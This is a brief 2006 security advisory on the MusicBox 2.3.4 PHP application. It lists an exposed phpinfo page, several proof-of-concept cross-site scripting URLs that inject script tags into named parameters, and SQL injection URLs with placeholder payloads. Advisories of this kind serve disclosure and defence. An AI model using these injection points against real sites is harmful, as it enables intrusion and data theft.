MusicBox <= 2.3.4 XSS SQL injection Vulnerability

2006-07-25T00:00:00
ID SECURITYVULNS:DOC:13612
Type securityvulns
Reporter Securityvulns
Modified 2006-07-25T00:00:00

Description

MusicBox 2.3.4 http://www.musicboxv2.com


PHPinfo page

/phpinfo.php

Cross Site Scripting (XSS)

http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists


SQL injection

http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]


Ellipsis Security http://www.ellsec.org